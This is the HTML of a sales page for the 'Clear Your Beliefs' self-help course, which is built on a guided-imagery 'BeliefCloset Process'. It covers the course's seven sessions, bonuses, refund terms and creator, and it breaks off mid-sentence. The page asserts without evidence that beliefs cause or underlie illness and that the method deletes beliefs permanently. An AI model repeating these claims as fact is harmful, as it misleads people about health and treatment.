href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p><p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the 